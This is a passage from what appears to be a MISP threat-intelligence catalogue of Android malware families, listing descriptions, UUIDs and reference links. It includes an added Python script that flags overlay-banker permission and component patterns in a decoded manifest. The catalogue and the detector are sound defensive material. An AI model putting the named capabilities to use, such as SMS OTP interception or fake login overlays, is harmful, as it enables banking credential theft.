- https://securelist.com/gravityrat-the-spy-returns/99097/ - webarchive
- https://www.welivesecurity.com/2023/06/15/android-gravityrat-goes-after-whatsapp-backups/ - webarchive
- https://blog.talosintelligence.com/cosmic-leopard/ - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
GriftHorse
Internal MISP references
UUID fe40a0b2-be48-41c5-8814-7fa3a6a993b9 which can be used as unique global reference for GriftHorse in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
Guerrilla
Internal MISP references
UUID 57de6ac2-8cf0-4022-aee2-5f76e3dbd503 which can be used as unique global reference for Guerrilla in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
Gustuff
Group-IB describes Gustuff as an Android trojan whose potential targets include customers of leading international banks, users of cryptocurrency services, and users of popular e-commerce websites and marketplaces. Gustuff had not been publicly reported before Group-IB's analysis. It is a new generation of malware with fully automated features designed to steal both fiat and cryptocurrency from user accounts en masse. The trojan abuses the Accessibility Service, which is intended to assist people with disabilities. Analysis of a Gustuff sample revealed that the trojan is equipped with web fakes designed to target users of the Android apps of top international banks including Bank of America, Bank of Scotland, J.P. Morgan, Wells Fargo, Capital One, TD Bank and PNC Bank, and of crypto services such as Bitcoin Wallet, BitPay, Cryptopay and Coinbase. Group-IB specialists discovered that Gustuff could potentially target users of more than 100 banking apps, including 27 in the US, 16 in Poland, 10 in Australia, 9 in Germany, and 8 in India, as well as users of 32 cryptocurrency apps.
Internal MISP references
UUID a5e2b65f-2087-465d-bf14-4acf891d5d0f which can be used as unique global reference for Gustuff in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/apk.gustuff - webarchive
- https://gallery.mailchimp.com/c35aef82661dad887b8162a4f/files/e24e8206-a157-4796-a8cb-2b7262cc76e8/CSIS_Threat_Matrix_H1_2019.pdf - webarchive
- https://www.group-ib.com/media/gustuff/ - webarchive
- https://blog.talosintelligence.com/2019/04/gustuff-targets-australia.html - webarchive
- https://www.threatfabric.com/blogs/the-rage-of-android-banking-trojans.html - webarchive
- https://www.threatfabric.com/blogs/2020_year_of_the_rat.html - webarchive
- https://blog.talosintelligence.com/2019/10/gustuffv2.html - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
HARDRAIN (Android)
Internal MISP references
UUID 0caf0292-b01a-4439-b56f-c75b71900bc0 which can be used as unique global reference for HARDRAIN (Android) in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/apk.hardrain - webarchive
- https://unit42.paloaltonetworks.com/unit42-operation-blockbuster-goes-mobile/ - webarchive
- https://www.us-cert.gov/sites/default/files/publications/MAR-10135536-F.pdf - webarchive
- https://securingtomorrow.mcafee.com/mcafee-labs/android-malware-appears-linked-to-lazarus-cybercrime-group/#sf174581990 - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
HawkShaw
Internal MISP references
UUID 5ae490bd-84ca-434f-ab34-b87bd38e4523 which can be used as unique global reference for HawkShaw in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
HenBox
Internal MISP references
UUID 0185f9f6-018e-4eb5-a214-d810cb759a38 which can be used as unique global reference for HenBox in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/apk.henbox - webarchive
- https://www.virusbulletin.com/virusbulletin/2020/03/vb2019-paper-pulling-pkplug-adversary-playbook-long-standing-espionage-activity-chinese-nation-state-adversary/ - webarchive
- https://unit42.paloaltonetworks.com/unit42-henbox-chickens-come-home-roost/ - webarchive
- https://unit42.paloaltonetworks.com/pkplug_chinese_cyber_espionage_group_attacking_asia/ - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
Hermit
Lookout states that Hermit is an advanced spyware designed to target iOS and Android mobile devices. It is designed to collect extensive amounts of sensitive data on its victims such as their location, contacts, private messages, photos, call logs, phone conversations, ambient audio recordings, and more.
Internal MISP references
UUID b95f25a0-ba22-4320-95e3-323fbf852846 which can be used as unique global reference for Hermit in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/apk.hermit - webarchive
- https://de.lookout.com/blog/hermit-spyware-discovery - webarchive
- https://www.lighthousereports.nl/investigation/revealing-europes-nso - webarchive
- https://blog.google/threat-analysis-group/italian-spyware-vendor-targets-users-in-italy-and-kazakhstan/ - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
HeroRAT
Internal MISP references
UUID 537f17ac-74e5-440b-8659-d4fdb4af41a6 which can be used as unique global reference for HeroRAT in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
HiddenAd
HiddenAd is a malware that shows ads as overlays on the phone.
Internal MISP references
UUID 171c97ca-6b61-426d-8f72-c099528625e9 which can be used as unique global reference for HiddenAd in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/apk.hiddenad - webarchive
- https://securelist.com/mobile-malware-evolution-2019/96280/ - webarchive
- https://www.mcafee.com/blogs/other-blogs/mcafee-labs/new-hiddenads-malware-that-runs-automatically-and-hides-on-google-play-1m-users-affected/ - webarchive
- https://labs.bitdefender.com/2020/03/infected-zoom-apps-for-android-target-work-from-home-users - webarchive
- https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf - webarchive
- https://twitter.com/LukasStefanko/status/1136568939239137280 - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
HilalRAT
A RAT that can be used to extract sensitive information such as contact lists, text messages, and location data.
Internal MISP references
UUID 96bea6aa-3202-4352-8e36-fa05c677c0e8 which can be used as unique global reference for HilalRAT in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
Hook
According to ThreatFabric, this is a malware family based on apk.ermac. The name Hook is the one self-advertised by its vendor, DukeEugene. It provides WebSocket communication and has RAT capabilities.
Internal MISP references
UUID c101bc42-1011-43f6-9d30-629013c318cd which can be used as unique global reference for Hook in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/apk.hook - webarchive
- https://research.nccgroup.com/2023/09/11/from-ermac-to-hook-investigating-the-technical-differences-between-two-android-malware-variants/ - webarchive
- https://medium.com/@joshuapenny88/hostinghunter-series-chang-way-technologies-co-limited-a9ba4fce0f65 - webarchive
- https://cebrf.knf.gov.pl/komunikaty/artykuly-csirt-knf/362-ostrzezenia/858-hookbot-a-new-mobile-malware - webarchive
- https://www.threatfabric.com/blogs/hook-a-new-ermac-fork-with-rat-capabilities.html - webarchive
- https://github.com/0xperator/hookbot_source - webarchive
- https://info.spamhaus.com/hubfs/Botnet%20Reports/Jan-Jun%202024%20Botnet%20Threat%20Update.pdf - webarchive
- https://www.sciencedirect.com/science/article/pii/S266628172400088X - webarchive
- https://info.spamhaus.com/hubfs/Botnet%20Reports/Jul-Dec%202024%20Botnet%20Threat%20Update.pdf - webarchive
- https://zimperium.com/blog/hook-version-3-the-banking-trojan-with-the-most-advanced-capabilities - webarchive
- https://www.spamhaus.org/resource-hub/botnet-c-c/botnet-threat-update-january-to-june-2025/ - webarchive
- https://info.spamhaus.com/hubfs/Botnet%20Reports/Q4%202023%20Botnet%20Threat%20Update.pdf - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
Hydra
Avira states that Hydra is an Android BankBot variant, a type of malware designed to steal banking credentials. It does this by asking the user to enable dangerous permissions such as the Accessibility Service; every time the banking app is opened, the malware hijacks the session by overlaying the legitimate banking application's login page with a malicious one. The goal is the same as for other bankers: trick the user into entering their login credentials so that they go straight to the malware authors.
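The overlay bankers described on this page (Ginp, Gigabud, Gustuff, Godfather and Hydra above) all rest on the same small set of Android capabilities: an AccessibilityService, the SYSTEM_ALERT_WINDOW overlay permission, SMS access, and a high-priority receiver for incoming SMS (the OTP-interception path that IRATA, below, also relies on). Those are declared in the manifest, so a first-pass triage can be done statically. The script below is an added example, not code from any of the vendors cited here; it assumes the manifest has already been decoded from binary AXML to plain XML (apktool or androguard do that) and the manifest it parses is constructed for illustration.

```python
"""Static triage of a decoded AndroidManifest.xml for the component and
permission pattern shared by Android overlay bankers.

Added example; the manifest below is constructed. Assumes the manifest has
already been decoded from binary AXML to text, which this script does not do.
"""
import xml.etree.ElementTree as ET

ANDROID_NS = "http://schemas.android.com/apk/res/android"


def _a(attr: str) -> str:
    """Return the namespaced key ElementTree uses for an android:attr."""
    return f"{{{ANDROID_NS}}}{attr}"


# Permissions whose combination is typical of overlay bankers. Any one of
# them alone is common in benign apps, which is why the verdict below needs
# at least two of the three capability groups (overlay, accessibility, SMS).
SUSPICIOUS_PERMISSIONS = {
    "android.permission.SYSTEM_ALERT_WINDOW": "overlay windows (fake login screens)",
    "android.permission.RECEIVE_SMS": "intercept incoming SMS (OTP theft)",
    "android.permission.READ_SMS": "read stored SMS",
    "android.permission.SEND_SMS": "send SMS (spreading, premium numbers)",
    "android.permission.READ_CONTACTS": "contact list collection",
    "android.permission.QUERY_ALL_PACKAGES": "installed-app listing (overlay targeting)",
    "android.permission.REQUEST_INSTALL_PACKAGES": "drop and install further payloads",
}


def triage_manifest(manifest_xml: str) -> dict:
    """Return the package name, a list of findings and a coarse verdict."""
    root = ET.fromstring(manifest_xml)
    findings = []

    declared = {p.get(_a("name")) for p in root.iter("uses-permission")}
    for perm, why in SUSPICIOUS_PERMISSIONS.items():
        if perm in declared:
            findings.append(f"permission {perm}: {why}")

    app = root.find("application")
    if app is not None:
        # An AccessibilityService is a <service> protected by
        # BIND_ACCESSIBILITY_SERVICE; bankers use it to read screens and
        # click through permission prompts on their own behalf.
        for svc in app.iter("service"):
            if svc.get(_a("permission")) == "android.permission.BIND_ACCESSIBILITY_SERVICE":
                findings.append(f"accessibility service {svc.get(_a('name'))}")
        # A receiver for SMS_RECEIVED with a high priority sees incoming
        # OTPs before the default messaging app does.
        for rcv in app.iter("receiver"):
            for flt in rcv.iter("intent-filter"):
                actions = {a.get(_a("name")) for a in flt.iter("action")}
                if "android.provider.Telephony.SMS_RECEIVED" in actions:
                    prio = flt.get(_a("priority"), "0")
                    findings.append(f"SMS_RECEIVED receiver {rcv.get(_a('name'))} priority={prio}")

    has_overlay = any("SYSTEM_ALERT_WINDOW" in f for f in findings)
    has_a11y = any(f.startswith("accessibility service") for f in findings)
    has_sms = any("SMS" in f for f in findings)
    score = has_overlay + has_a11y + has_sms
    verdict = "banker-pattern" if score >= 2 else ("review" if score == 1 else "clean")
    return {"package": root.get("package", "?"), "findings": findings, "verdict": verdict}


# Constructed manifest in the shape an overlay banker leaves after decoding.
SAMPLE_MANIFEST = """\
<manifest xmlns:android="http://schemas.android.com/apk/res/android"
          package="com.example.fakebank">
  <uses-permission android:name="android.permission.INTERNET"/>
  <uses-permission android:name="android.permission.SYSTEM_ALERT_WINDOW"/>
  <uses-permission android:name="android.permission.RECEIVE_SMS"/>
  <uses-permission android:name="android.permission.READ_CONTACTS"/>
  <application android:label="Bank">
    <activity android:name=".MainActivity"/>
    <service android:name=".A11yService"
             android:permission="android.permission.BIND_ACCESSIBILITY_SERVICE">
      <intent-filter>
        <action android:name="android.accessibilityservice.AccessibilityService"/>
      </intent-filter>
    </service>
    <receiver android:name=".SmsReceiver">
      <intent-filter android:priority="999">
        <action android:name="android.provider.Telephony.SMS_RECEIVED"/>
      </intent-filter>
    </receiver>
  </application>
</manifest>
"""

if __name__ == "__main__":
    report = triage_manifest(SAMPLE_MANIFEST)
    print(report["package"], report["verdict"])
    for line in report["findings"]:
        print("  -", line)
```

The verdict is deliberately coarse: accessibility tools, SMS clients and screen-overlay utilities each legitimately declare one of these groups, so the heuristic only flags the combination and leaves the single-capability case for manual review. Many current bankers hide the real manifest inside a dropped second-stage APK, so run this over every APK the dropper writes, not just the one from the store.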
Internal MISP references
UUID ae25953d-cf7c-4304-9ea2-2ea1498ea035 which can be used as unique global reference for Hydra in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/apk.hydra - webarchive
- https://cryptax.medium.com/android-bianlian-payload-61febabed00a - webarchive
- https://cryptax.medium.com/quick-look-into-a-new-sample-of-android-bianlian-bc5619efa726 - webarchive
- https://pentest.blog/android-malware-analysis-dissecting-hydra-dropper/ - webarchive
- https://resecurity.com/blog/article/in-the-box-mobile-malware-webinjects-marketplace - webarchive
- https://medium.com/@joshuapenny88/hostinghunter-series-chang-way-technologies-co-limited-a9ba4fce0f65 - webarchive
- https://info.spamhaus.com/hubfs/Botnet%20Reports/2023%20Q2%20Botnet%20Threat%20Update.pdf - webarchive
- https://blog.cyble.com/2022/06/13/hydra-android-malware-distributed-via-play-store/ - webarchive
- https://cryptax.medium.com/creating-a-safe-dummy-c-c-to-test-android-bots-ffa6e7a3dce5 - webarchive
- https://cocomelonc.github.io/book/2025/05/19/aiya-mmd-book.html - webarchive
- https://twitter.com/muha2xmad/status/1570788983474638849 - webarchive
- https://www.threatfabric.com/blogs/deceive-the-heavens-to-cross-the-sea.html - webarchive
- https://www.threatfabric.com/blogs/2020_year_of_the_rat.html - webarchive
- https://muha2xmad.github.io/malware-analysis/hydra/ - webarchive
- https://www.avira.com/en/blog/avira-labs-research-reveals-hydra-banking-trojan-2-0 - webarchive
- https://cryptax.medium.com/bianlian-c-c-domain-name-4f226a29e221 - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
IPStorm (Android)
Android variant of IPStorm (InterPlanetary Storm).
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular IPStorm (Android).
| Known Synonyms |
|---|
InterPlanetary Storm |
Internal MISP references
UUID dc0c8824-64ac-4ab2-a0e4-955a14ecc59c which can be used as unique global reference for IPStorm (Android) in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/apk.ipstorm - webarchive
- https://blog.barracuda.com/2020/10/01/threat-spotlight-new-interplanetary-storm-variant-iot/ - webarchive
- https://cocomelonc.github.io/book/2025/05/19/aiya-mmd-book.html - webarchive
- https://www.justice.gov/usao-pr/pr/russian-and-moldovan-national-pleads-guilty-operating-illegal-botnet-proxy-service - webarchive
- https://www.bitdefender.com/files/News/CaseStudies/study/376/Bitdefender-Whitepaper-IPStorm.pdf - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
IRATA
According to Red Piranha, IRATA (Iranian Remote Access Trojan) is a new Android malware detected in the wild. Infection starts with a phishing attack over SMS: the message is themed to look like a government communication and asks the recipient to download the malicious application. IRATA can collect sensitive information from the phone, including bank details. Because it runs on the device, it can also harvest SMS messages, which can then be used to obtain 2FA tokens.
Internal MISP references
UUID 24fb43b4-d6a6-49c0-a862-4211a245b635 which can be used as unique global reference for IRATA in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
IRRat
Internal MISP references
UUID 3e7c6e8c-46fc-4498-a28d-5b3d144c51cf which can be used as unique global reference for IRRat in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
JadeRAT
Internal MISP references
UUID 8804e02c-a139-4c3d-8901-03302ca1faa0 which can be used as unique global reference for JadeRAT in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
Joker
Joker is one of the best-known malware families on Android. It repeatedly makes it into Google's official app store by changing its trail: updating its code, its execution process, and its payload-retrieval techniques. The malware can steal users' personal information, including contact details, device data, and SMS messages, and abuses WAP billing to sign victims up to premium services.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Joker.
| Known Synonyms |
|---|
Bread |
Internal MISP references
UUID aa2ad8f4-3c46-4f16-994b-2a79c7481cac which can be used as unique global reference for Joker in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/apk.joker - webarchive
- https://medium.com/csis-techblog/analysis-of-joker-a-spy-premium-subscription-bot-on-googleplay-9ad24f044451 - webarchive
- https://blogs.quickheal.com/stay-alert-joker-still-making-its-way-on-google-play-store/ - webarchive
- https://www.spamhaus.org/resource-hub/botnet-c-c/botnet-threat-update-january-to-june-2025/ - webarchive
- https://research.checkpoint.com/2020/new-joker-variant-hits-google-play-with-an-old-trick/ - webarchive
- https://hunt.io/blog/uncovering-joker-c2-network - webarchive
- https://security.googleblog.com/2020/01/pha-family-highlights-bread-and-friends.html - webarchive
- https://labs.bitdefender.com/2020/03/android-apps-and-malware-capitalize-on-coronavirus - webarchive
- https://www.trendmicro.com/en_us/research/20/k/an-old-jokers-new-tricks--using-github-to-hide-its-payload.html - webarchive
- https://blogs.quickheal.com/google-play-store-applications-laced-with-joker-malware-yet-again/ - webarchive
- https://labs.k7computing.com/?p=22199 - webarchive
- https://www.microsoft.com/security/blog/2022/06/30/toll-fraud-malware-how-an-android-application-can-drain-your-wallet/ - webarchive
- https://www.threatfabric.com/blogs/toad-fraud - webarchive
- https://web.archive.org/web/20210714010827/https://blog.zimperium.com/joker-is-still-no-laughing-matter/ - webarchive
- https://muha2xmad.github.io/malware-analysis/hydra/ - webarchive
- https://cryptax.medium.com/live-reverse-engineering-of-a-trojanized-medical-app-android-joker-632d114073c1 - webarchive
- https://cryptax.medium.com/tracking-android-joker-payloads-with-medusa-static-analysis-and-patience-672348b81ac2 - webarchive
- https://labs.k7computing.com/index.php/joker-unleashes-itself-again-on-google-play-store/ - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
KevDroid
Internal MISP references
UUID 1e1924b5-89cb-408b-bcee-d6aaef7b24e0 which can be used as unique global reference for KevDroid in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/apk.kevdroid - webarchive
- https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf - webarchive
- https://researchcenter.paloaltonetworks.com/2018/04/unit42-reaper-groups-updated-mobile-arsenal/ - webarchive
- https://blog.talosintelligence.com/2018/04/fake-av-investigation-unearths-kevdroid.html - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
KnSpy
Internal MISP references
UUID 084ebca7-91da-4d9c-8211-a18f358ac28b which can be used as unique global reference for KnSpy in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/apk.knspy - webarchive
- https://twitter.com/voodoodahl1/status/1267571622732578816 - webarchive
- https://cybleinc.com/2021/04/21/donot-team-apt-group-is-back-to-using-old-malicious-patterns/ - webarchive
- https://s.tencent.com/research/report/951.html - webarchive
- https://blog.talosintelligence.com/2020/10/donot-firestarter.html - webarchive
- https://community.riskiq.com/article/6f60db72 - webarchive
- https://blogs.360.cn/post/APT-C-35_target_at_armed_forces_in_Pakistan.html - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
Koler
Internal MISP references
UUID 4ff34778-de4b-4f48-9184-4975c8ccc3f3 which can be used as unique global reference for Koler in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
Konni (Android)
Internal MISP references
UUID d4f90ffc-72cb-49a5-b796-527785f49161 which can be used as unique global reference for Konni (Android) in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
KoSpy
According to Lookout, this spyware was first observed in March 2022 and remains active with new samples still publicly hosted. It uses a two-stage C2 infrastructure that retrieves initial configurations from a Firebase cloud database. KoSpy can collect extensive data, such as SMS messages, call logs, location, files, audio, and screenshots via dynamically loaded plugins. The spyware has Korean language support with samples distributed across Google Play and third-party app stores such as Apkpure.
Internal MISP references
UUID b7a1499f-b5fb-4b1f-a2ec-f7907faa506b which can be used as unique global reference for KoSpy in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
KSREMOTE
Internal MISP references
UUID 196d51bf-cf97-455d-b997-fc3e377f2188 which can be used as unique global reference for KSREMOTE in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
LANDFALL
Internal MISP references
UUID f5c4095f-d1c5-4026-8fc0-946f0575cd7f which can be used as unique global reference for LANDFALL in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
LittleLooter
Internal MISP references
UUID 41cb4397-7ae0-4a9f-894f-47828e768aa9 which can be used as unique global reference for LittleLooter in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/apk.little_looter - webarchive
- https://i.blackhat.com/USA21/Wednesday-Handouts/us-21-The-Kitten-That-Charmed-Me-The-9-Lives-Of-A-Nation-State-Attacker.pdf - webarchive
- https://securityintelligence.com/posts/itg18-operational-security-errors-plague-iranian-threat-group/ - webarchive
- https://www.youtube.com/watch?v=nilzxS9rxEM - webarchive
- https://twitter.com/malwrhunterteam/status/1337684036374945792 - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
Loki
Internal MISP references
UUID a6f481fe-b6db-4507-bb3c-28f10d800e2f which can be used as unique global reference for Loki in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
LokiBot
An Android banking trojan with the standard banking capabilities such as overlays and SMS stealing. It also features ransomware functionality. Note that the network traffic is obfuscated the same way as in Android BankBot.
Internal MISP references
UUID 4793a29b-1191-4750-810e-9301a6576fc4 which can be used as unique global reference for LokiBot in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/apk.lokibot - webarchive
- https://news.sophos.com/en-us/2020/07/14/raticate-rats-as-service-with-commercial-crypter/?cmp=30728 - webarchive
- https://drive.google.com/file/d/144cOnM6fxfuBeP0V2JQshp8C0Zlk_0kH/view - webarchive
- https://muha2xmad.github.io/mal-document/lokibotpdf/ - webarchive
- https://www.threatfabric.com/blogs/lokibot_the_first_hybrid_android_malware.html - webarchive
- https://embee-research.ghost.io/infrastructure-analysis-with-dns-pivoting/ - webarchive
- https://isc.sans.edu/diary/27282 - webarchive
- https://github.com/vc0RExor/Malware-Threat-Reports/blob/main/Lokibot/Machete-Weapons-Lokibot/Machete%20weapons-Lokibot_EN.pdf - webarchive
- https://securelist.com/emotet-darkgate-lokibot-crimeware-report/110286/ - webarchive
- https://yoroi.company/research/aggah-how-to-run-a-botnet-without-renting-a-server-for-more-than-a-year/ - webarchive
- https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/steganoamor-campaign-ta558-mass-attacking-companies-and-public-institutions-all-around-the-world/ - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
LuckyCat
Internal MISP references
UUID 1785a4dd-4044-4405-91c2-efb722801867 which can be used as unique global reference for LuckyCat in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
LunaSpy
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular LunaSpy.
| Known Synonyms |
|---|
Backdoor.916 |
Internal MISP references
UUID 259eb95e-f622-40d2-b6e0-79d07035fef5 which can be used as unique global reference for LunaSpy in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
Mandrake
Internal MISP references
UUID 0f587654-7f70-43be-9f1f-95e3a2cc2014 which can be used as unique global reference for Mandrake in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
Marcher
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Marcher.
| Known Synonyms |
|---|
ExoBot |
Internal MISP references
UUID f691663a-b360-4c0d-a4ee-e9203139c38e which can be used as unique global reference for Marcher in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/apk.marcher - webarchive
- https://www.clientsidedetection.com/exobot_v2_update___staying_ahead_of_the_competition.html - webarchive
- https://securelist.com/mobile-malware-evolution-2019/96280/ - webarchive
- https://www.zscaler.de/blogs/research/android-marcher-continuously-evolving-mobile-malware - webarchive
- https://www.proofpoint.com/us/blog/threat-insight/update-fake-updates-two-new-actors-and-new-mac-malware - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
MasterFred
According to Heimdal, MasterFred is an Android trojan that uses fake login overlays to target not only Netflix, Instagram, and Twitter users but also bank customers. The attackers' goal is to steal credit card information.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular MasterFred.
| Known Synonyms |
|---|
Brox |
Internal MISP references
UUID 87131ea3-4c5e-42ba-a8e2-edd62a0bcd8d which can be used as unique global reference for MasterFred in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
MazarBot
Internal MISP references
UUID 38cbdc29-a5af-46ae-ab82-baf3f6999826 which can be used as unique global reference for MazarBot in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
Medusa (Android)
According to ThreatFabric, this is an Android banking trojan under active development as of July 2020. It is using TCP for C&C communication and targets Turkish banks.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Medusa (Android).
| Known Synonyms |
|---|
Gorgona |
Internal MISP references
UUID f155e529-dbea-4e4d-9df3-518401191c82 which can be used as unique global reference for Medusa (Android) in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/apk.medusa - webarchive
- https://www.cleafy.com/cleafy-labs/medusa-reborn-a-new-compact-variant-discovered - webarchive
- https://twitter.com/ThreatFabric/status/1285144962695340032 - webarchive
- https://www.threatfabric.com/blogs/partners-in-crime-medusa-cabassous.html - webarchive
- https://www.threatfabric.com/blogs/the-rage-of-android-banking-trojans.html - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
Meterpreter (Android)
Internal MISP references
UUID e1ae3e4e-5aaf-4ffe-ba2f-7871507f6d52 which can be used as unique global reference for Meterpreter (Android) in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/apk.meterpreter - webarchive
- https://medium.com/@cryptax/locating-the-trojan-inside-an-infected-covid-19-contact-tracing-app-21e23f90fbfe - webarchive
- https://medium.com/@cryptax/into-android-meterpreter-and-how-the-malware-launches-it-part-2-ef5aad2ebf12 - webarchive
- https://www.trendmicro.com/en_us/research/20/l/sidewinder-leverages-south-asian-territorial-issues-for-spear-ph.html - webarchive
- https://mp.weixin.qq.com/s/J_A12SOX0k5TOYFAegBv_w - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
MobileOrder
Check Point has identified samples of this spyware being distributed since 2015. No samples were found on Google Play, meaning they were likely distributed through other channels such as social engineering.
Internal MISP references
UUID ee19588f-9752-4516-85f4-de18acfc64b3 which can be used as unique global reference for MobileOrder in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
Monokle
Monokle is a sophisticated mobile surveillanceware that possesses remote access trojan (RAT) functionality, advanced data exfiltration techniques, and the ability to install an attacker-specified certificate into the trusted certificates on an infected device, which would allow for man-in-the-middle (MITM) attacks. According to Lookout researchers, it is believed to be developed by Special Technology Center (STC), a Russian defense contractor sanctioned by the U.S. Government in connection with alleged interference in the 2016 US presidential elections.
Internal MISP references
UUID 739d6d22-b187-4754-9098-22625ea612cc which can be used as unique global reference for Monokle in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/apk.monokle - webarchive
- https://www.lookout.com/documents/threat-reports/lookout-discovers-monokle-threat-report.pdf - webarchive
- https://citizenlab.ca/2024/12/device-confiscated-by-russian-authorities-returned-with-monokle-type-spyware-installed/ - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
MoqHao
MoqHao, also called Wroba and XLoader (not to be confused with the malware of the same name for Windows and macOS), is an Android-based mobile threat that is associated with a financially motivated Chinese group called Roaming Mantis. The malware claims to be the default SMS application and has dropper and banker capabilities.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular MoqHao.
| Known Synonyms |
|---|
| Shaoye |
| Wroba |
| XLoader |
Internal MISP references
UUID 41a9408d-7020-4988-af2c-51baf4d20763 which can be used as unique global reference for MoqHao in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/apk.moqhao - webarchive
- https://cryptax.medium.com/a-native-packer-for-android-moqhao-6362a8412fe1 - webarchive
- https://www.kashifali.ca/2021/05/05/roaming-mantis-amplifies-smishing-campaign-with-os-specific-android-malware/ - webarchive
- https://www.trendmicro.com/en_us/research/18/k/a-look-into-the-connection-between-xloader-and-fakespy-and-their-possible-ties-with-the-yanbian-gang.html - webarchive
- https://securelist.com/roaming-mantis-dns-changer-in-malicious-mobile-app/108464/ - webarchive
- https://www.trendmicro.com/en_us/research/18/d/xloader-android-spyware-and-banking-trojan-distributed-via-dns-spoofing.html - webarchive
- https://securelist.com/roaming-mantis-part-v/96250/ - webarchive
- https://team-cymru.com/blog/2022/04/07/moqhao-part-2-continued-european-expansion/ - webarchive
- https://www.team-cymru.com/post/moqhao-part-3-recent-global-targeting-trends - webarchive
- https://www.telekom.com/en/blog/group/article/moqhao-masters-new-tricks-1031484 - webarchive
- https://blog.trendmicro.com/trendlabs-security-intelligence/a-look-into-the-connection-between-xloader-and-fakespy-and-their-possible-ties-with-the-yanbian-gang/ - webarchive
- https://team-cymru.com/blog/2021/08/11/moqhao-part-1-5-high-level-trends-of-recent-campaigns-targeting-japan/ - webarchive
